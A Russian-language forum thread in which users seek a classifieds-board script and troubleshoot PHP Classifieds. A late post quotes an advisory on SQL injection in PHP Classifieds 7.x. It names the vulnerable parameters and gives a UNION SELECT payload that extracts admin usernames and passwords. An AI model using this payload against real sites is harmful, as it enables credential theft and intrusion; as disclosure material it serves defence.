Помогите найти скрипт доски объявлений со следующими функциями...

Статус
В этой теме нельзя размещать новые ответы.
Ну товарищ вы даёте ...
*** скрытое содержание ***

Ссылки которые ты дал (первые) они не работают :(
Первая ссылка перекидывает на главную гугла
а по Второй ссылке пишут что такой темы нет :(
 
Подскажите сущесвуют ли доски по функционалу сравнимые с PHP Classifieds, но без обязательной регистрации?

Среди отечественных как я понимаю альтернативы нет.
Ну если чето понимаешь в пхп и смарти, думаю не составит огромного труда дописать один файл, чеб можно было оставлять сообщения без регистрации.
Или ищи чето, но я пока не нарыл такого
 
Ищу скрипт с защитой от спама в объявлениях числом ? Желательно доска встроенная в форум.
 
Ищу скрипт с защитой от спама в объявлениях числом ? Желательно доска встроенная в форум.
PHP Classifieds с оф сайта последняя там есть интеграция в форум и защита от спама, и много других фитчей вобщем нравится она мне
 
класный скрипт, откуда бы его взять
 
На PHP Classifieds почемуто в рунете не много качественных досок. Наверное он не адаптирован под рутет. Попробуйте лучше жозефину или 1пост. А с защитой от спама будут в несколько раз реже добавлять объявы. Это очень надолго.
 
:nezn:
У меня почемуто с PHP Classifieds проблемы возникают, не могу настроить, вродебы разобрался с кодировкой, дизайн радикально переделал, но возникает пролмема в том, что слова отображаются не полностью...

может к примеру вместо "продаю автомобиль" просто писаться "прод| ав" или какие-нибудь символы... хотя в базе все нормально...

в общем :-] снова в поисках доски
 
dennykru
как делал дизайн?что получилось можешь показать.?

Кодировку не стоит трогать.пусть все будет УТФ, тогда большинство проблем уходят.кроме почему то входа в админку.
А качественных досок мало, потому что его дорабатывать надо вплане полей и т.д.
 
PHP Classifieds 7.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Из-за ошибки проверки вводимых пользовательских данных в параметре «catid_search» различными сценариями злоумышленник может произвести SQL-инъекцию.


search.php?catid_search=[sql]
index.php?catid=[sql]

Например, вывести имя пользователя и пароль в заголовок страницы:

index.php?catid=0 UNION SELECT concat(adm_name, space(1), adm_pass) AS adm_name, NULL FROM phpclass_admins

Добавлено через 1 минуту
Описание:
Входящие данные в параметре "user_id" в detail.php, должным образом не проверяются перед SQL запросом. Эта уязвимость позволяет управлять запросами, вводя произвольный код SQL.

Примеры:

Для просмотра ссылки Войди или Зарегистрируйся
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху